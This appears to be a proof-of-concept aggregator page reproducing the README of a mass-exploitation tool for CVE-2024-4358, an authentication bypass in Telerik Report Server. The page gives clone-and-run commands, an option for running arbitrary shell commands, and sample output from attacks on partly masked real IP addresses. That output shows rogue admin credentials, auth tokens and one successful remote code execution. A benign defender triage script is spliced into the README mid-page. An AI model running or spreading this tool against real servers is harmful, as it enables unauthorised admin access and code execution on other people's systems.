CVE-2024-4358 PoC — Registration Authentication Bypass Vulnerability

Source
Associated Vulnerability
Title: Registration Authentication Bypass Vulnerability (CVE-2024-4358)
Description: In Progress Telerik Report Server, version 2024 Q1 (10.0.24.305) or earlier, on IIS, an unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability.
Description
A vulnerability detection and exploitation tool for CVE-2024-4358
Readme
# CVE-2024-4358
A vulnerability detection and mass exploitation tool for CVE-2024-4358

### Installation:
```bash
# Clone the repository and enter it so requirements.txt and exploit.py resolve
git clone https://github.com/RevoltSecurities/CVE-2024-4358
cd CVE-2024-4358
pip install -r requirements.txt
python3 exploit.py --help
```
### Usage:
```text
python3 exploit.py -h


    ______     ____  __         _ ______         
   / ____/  __/ __ \/ /  ____  (_)_  __/__  _____
  / __/ | |/_/ /_/ / /  / __ \/ / / / / _ \/ ___/
 / /____>  </ ____/ /__/ /_/ / / / / /  __/ /    
/_____/_/|_/_/   /_____|____/_/ /_/  \___/_/     
  
                    @RevoltSecurities

[Description]: Vulnerability Detection and Exploitation tool for CVE-2024-4358

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     [INF]: Specify a URL or IP wtih port for vulnerability detection
  -l LIST, --list LIST  [INF]: Specify a list of URLs or IPs for vulnerability detection
  -c COMMAND, --command COMMAND
                        [INF]: Specify a shell command to execute it
  -t THREADS, --threads THREADS
                        [INF]: Number of threads for list of URLs
  -proxy PROXY, --proxy PROXY
                        [INF]: Proxy URL to send request via your proxy
  -v, --verbose         [INF]: Increases verbosity of output in console
  -o OUTPUT, --output OUTPUT
                        [INF]: Filename to save output of vulnerable target]

```

### Sample Usage:
```text
python3 exploit.py -l urls.txt -c id -t 10


    ______     ____  __         _ ______         
   / ____/  __/ __ \/ /  ____  (_)_  __/__  _____
  / __/ | |/_/ /_/ / /  / __ \/ / / / / _ \/ ___/
 / /____>  </ ____/ /__/ /_/ / / / / /  __/ /    
/_____/_/|_/_/   /_____|____/_/ /_/  \___/_/     
  
                    @RevoltSecurities

[Vulnerale]: Report for: http://13.42.129.XXX
 Login Crendentials: Usename: ozsebbQpibJbHpghuNLxutxBOl | Password: NvmpjJucmxtqhOtdFtrxfoguvQ | Authentication Token: 7CKVJAPcvFGsfIwxON6KgCy85k8xwDXoKGzV1A3KgUeB-y-DQ_F6k86XjY9KCbSjuHcaog-AJ8AApDtOkGvDw109zvjJUllJESksFmxd8ZK8r1Xdn8u-5sHX-RWmbJBEg5tDSOaQrPPNCds7RyzhEGcTiVbG0gDUfiIFgmwNWa1i8VOhhTgASDARnfPXfOfqsWqv23SrLXteuEXNymjDrC-GXWvhRHZ8a_vWhfJBSBB7aBZmXux1iq07InnAPwYC2Y12TrEG6MUPPCBHSW-vlld850MBuCktR7vjLdzahJAAdERMbAudSnetHBY4AN-221F6iIY2GjjenRiNCnJOt8gfK3I5b57d6QFy3i3a4GxnM-5AUfTGrbHrHrxP5hzpfz5bhG-xulDTyOK-g6UJJQOQBIWHIUA-QOzOufSNovv0gBnhilYBTY9ITDJSOOWSdxDVmr4U4re8xI_3InkeK8IRkIzMmTxrrnQi_J8or0hqP-7yMPCJR5gIQrOMUXPtatpVqZikho8aR3aWCcAHmoJr5yU
 Deserialization RCE: Failed
[Vulnerale]: Report for: http://52.2.58.XX
 Login Crendentials: Usename: pjzgrOrjJXqQyFoubmrcSkHZHC | Password: ZrGVXZqIrgWkuHCgUlkHIeYPG | Authentication Token: S6q_Le5LoTqew1AmblOvZfBU5R7U0BEcBJ84UvvBf2HnUzJ_wCtstEYHqhxgEBSj7uWQ7iCCoW-_I5Z7XXpkolAN831q_NWsarTsqbm98XKP5CToJ_7lrS_1SbWCd6TJbdrBYHoSCEnRF0DMbhPzdY4TGv9P7gJQHf37jPm2lkDfC6kLyBXFopZklIwv6WrvmFw04vzLDKCWpgLP88GGqRKPJPnMNNarIUu9Mn_fV2WOei4LFWJMnmHTyLPAhK7eMLmjGmwr6jgRQp7C7PhNIpugRvUkyS8381ddVcXV8LJv2OR2yA2e2efE-Oc0
 Deserialization RCE: Failed
[Vulnerale]: Report for: http://194.233.XXX.235:83
 Login Crendentials: Usename: YmWwYloORUtOUPGuVDCbxZmuEKoIPL | Password: EPuvJTzroIfncpAHHGjJYXAKaPhQMW | Authentication Token: Ja42x9_DsL88xoSpm9xJoVIyeYEesbK2p-tZnOP-yvuiiF_DYNA6vNBeIwe8y2OcUJuOcCPtR_ODGynVtgCMmtpZxb_KRusasjNrlM2cNPKP4omDYacvcejGPycPmmd_A4Qi0ohEPG3Y4JfaU7Le3DJlMSTEoneCqcrXRqNS2JbTIXzOSXM3dSMz_0AwgHVN4H35HCkcAbedA5c-OLv_d6n9evsyHiHm15FuqbWzzqq-nTcXRiUtSYXEspCyiXE22ZlRdzClA6WDKC0-b1kFWj4Jb1yr3WULzmYHespHoRnXti_1gJoRs6Qbv2
 Report created: ELHaimYtblAxViEKIXxpdFyOXNlEHb
 Deserialization RCE: Success
Exploiter |████████████████████████████████████████| 3/3 [100%] in 7.5s (0.34/s) 
```
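For defenders, a triage sketch built on the two things this page shows: the last affected build (10.0.24.305) and the shape of the account and report names in the sample output. This is an added example, not part of the tool or its README; the inventory record layout (`host`, `version`, `users`, `reports`), the host names and all sample data are constructed assumptions.

```python
import re

# Last affected build, from the advisory text on this page.
LAST_AFFECTED = (10, 0, 24, 305)

# Heuristic taken from the sample output above: the tool's account and report
# names are one run of 20-32 ASCII letters, mixed case, no separators.
RANDOM_NAME = re.compile(r"[A-Za-z]{20,32}")


def parse_version(text):
    """'10.0.24.305' -> (10, 0, 24, 305); short versions are zero-padded."""
    parts = [int(p) for p in text.strip().split(".")]
    if not 1 <= len(parts) <= 4:
        raise ValueError(f"unexpected version string: {text!r}")
    return tuple(parts + [0] * (4 - len(parts)))


def is_affected(version_text):
    return parse_version(version_text) <= LAST_AFFECTED


def looks_generated(name):
    if not RANDOM_NAME.fullmatch(name):
        return False
    return any(c.islower() for c in name) and any(c.isupper() for c in name)


def triage(server):
    """Findings for one inventory record: (kind, value) tuples."""
    findings = []
    if is_affected(server["version"]):
        findings.append(("affected-version", server["version"]))
    for kind, label in (("users", "suspicious-user"), ("reports", "suspicious-report")):
        findings += [(label, n) for n in server.get(kind, []) if looks_generated(n)]
    return findings


# Constructed inventory (hypothetical hosts, names and builds).
INVENTORY = [
    {"host": "rs-01.example.internal", "version": "10.0.24.305",
     "users": ["admin", "jsmith"], "reports": ["Quarterly Sales"]},
    {"host": "rs-02.example.internal", "version": "10.1.24.514",
     "users": ["admin", "kTzqWmPLrvYdNhGsBxoCeJuA"],
     "reports": ["Inventory", "hGdLpQwZxVbNmKjTrYsEoUiA"]},
]

if __name__ == "__main__":
    for server in INVENTORY:
        print(server["host"], triage(server))
```

Accounts and reports created before an upgrade persist after it, so the name check is worth running on patched servers too. The pattern is a triage heuristic and will also match legitimate names of the same shape.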

### INFO:
The tool was developed by [D.Sanjai Kumar @RevoltSecurities](https://www.linkedin.com/in/d-sanjai-kumar-109a7227b/) to detect and mass-exploit the vulnerability CVE-2024-4358.
The tool is for educational and ethical purposes only, and the developers are not responsible for any illegal exploitation.
File Snapshot

[4.0K] /data/pocs/96b2b0f10803bd85e93d62925da7c04fca9bd352
├── [ 14K] exploit.py
├── [4.1K] README.md
└── [ 107] requirements.txt

0 directories, 3 files